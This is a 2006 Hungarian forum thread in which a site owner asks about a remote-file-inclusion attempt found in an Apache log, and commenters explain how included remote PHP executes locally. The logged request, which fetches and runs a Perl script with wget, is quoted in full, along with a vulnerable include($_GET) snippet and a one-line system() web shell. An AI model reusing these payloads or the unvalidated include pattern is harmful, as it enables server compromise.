ugrás a tartalomhoz

Script futtatási kisérlet?

Anonymous · 2006. Már. 31. (P), 06.51
A rendszergazdánk ilyet talált az apache access.log-ban:
  1. valami.php?cont=http://tavoli-domain.com/tool.gif?&cmd=cd%20/tmp/;wget%20http://tavoli-domain2.com/gif.txt;perl%20gif.txt;rm%20-rf%20gif*  
A domain neveket kicseréltem, a fájlnevek valósak. Belép a /temp-be, letölt egy perl scriptet amit futtat majd torol. Én csak az nem értem, még ha sikerülne is beincludolnia a $_GET["cont"]-on keresztül egy távoli php fájlt (nem sikerült, de tetelezzuk fel), az akkor sem a mi szerverünkön hajtódna végre, hanem a tavoli-domain.com-on. Innentől kezdve azt tudom elképzelni, hogy a tavoli-domain.com-on akartak scriptet futtatni, és ezzel a probalkozassal a mi szerevrünk ip-címe kerülne be az ottani access.log-ba. Jól gondolom?
Ennek ellenére csak sikerült a mi szerverünk /temp-jébe is irni, a levelezőszerverünkön keresztül spam-eket probaltak küldeni egy scripttel.
Egyéb tényezőktöl eltekintve (miért van wget,perl,php system() függvény engedélyezve), nyugtassatok meg, h a fenti próbálkozással nem lehet irni a /temp-be.
 
1

?

Anonymous · 2006. Már. 31. (P), 16.50
senki?
2

Egészen

janoszen · 2006. Már. 31. (P), 18.36
Végigolvasva, ez tényleg betörési kisérlet volt, úgyhogy szvsz a szerver tulajdonosa forduljon rendőrséghez és próbáljátok meg megtalálni, kié az a szerver. Ha jól van megcsinálva a szerveretek configja, akkor nem tudott írni.

Mindazonáltal igen udvariatlan dolog akkor, ha senki sem válaszol, türelmetlenkedni.
3

de hogy tud irni?

Anonymous · 2006. Már. 31. (P), 19.31
Én azt nem értem (még ha rosszul is lenne konfigolva a szerver) hogy tudna a /temp-be irni a fenti peldaval? Az a fajl amit get-en keresztul akart beincludolni a távoli szerveren fut le, nem tud irni a mi szerverünk /temp-jebe.
4

zizi

Anonymous · 2006. Már. 31. (P), 20.58
Ez egyértelműen egy automatizált hibakeresés. Ilyenner törtek fel egyszer. A phpBB (kiválló fórumozó motor) egyik .php-jét használva. Szóval valmi konkrét webapp-ban előforduló hibát próbálgathatott éppen a bot. Nem érdemes odafigyelni az ilyesmire.

Bence
http://vbence.web.elte.hu
5

Nem...

janoszen · 2006. Már. 31. (P), 23.19
...ha a scripted nem értelmezi a parancssort, amit kiadott GET paraméterben.
7

de neeem lehet

Anonymous · 2006. Ápr. 1. (Szo), 09.10
A GET-et leellenorzom, ha nem olyan amilyen kellene akkor egy default ag fut le. De ha nem ellenoriznem le, akkor sem ertem h tudna parancsot futtatni system() fuggvennyel egy tavoli fajlbol. A távoli fájl a távoli szerveren fut le, de errol valahogy a környezetemben sem tudok senkit meggyozni :)
Ha csinálnék egy fájlt aminek a tartalma csak annyi lenne:
  1. <?php  
  2. include($_GET["cont"]);  
  3. ?>  
Azon keresztül sem tudna senki kart tenni távoli fájllal.
A gond az, h a rendszergazdank megvan győződve ha ezen keresztül beiincludolok egy:
  1. <?php  
  2. system($_GET["cmd"]);  
  3. ?>  
tartalmú távoli(!!!) fájlt, akkor barmit megtehet a rendszerrel ami az adott user jogosultsagaval lehetséges. A témanyitó hozzászólásban is ilyesmivel probalkoznak.

üdv.: Zsolt
8

szerkeszt

Anonymous · 2006. Ápr. 1. (Szo), 09.13
szerkeszt:
A témanyitó hozzászólásban is ilyesmivel probalkoznak, de ennek nincs értelme, mert nem a mi szerverünkön fut le.

üdv.: Zsolt
9

include

attlad · 2006. Ápr. 1. (Szo), 11.48
Azon keresztül sem tudna senki kart tenni távoli fájllal.

De, futtathat bármilyen PHP kódot a szervereden.

A távoli fájl a távoli szerveren fut le

? Távoli fájlnak lehet PHP kód a kimenete (pl. txt fájl), ha te azt beinclude-olod, akkor lefut a kód a szervereden.
10

igy mar ertem

Anonymous · 2006. Ápr. 1. (Szo), 14.24
Távoli fájlnak lehet PHP kód a kimenete (pl. txt fájl), ha te azt beinclude-olod, akkor lefut a kód a szervereden.

ok, így már értem, erre nem is gondoltam.

üdv.: Zsolt
6

Rendőrség

attlad · 2006. Ápr. 1. (Szo), 02.09
Egy másik témánál is valaki ezt javasolta.. Szerintem erre nem a rendőrség a válasz hanem a HTTP 404. Az, hogy az étteremben valaki olyat kér ami nem szerepel az étlapon, nem betörési kísérlet.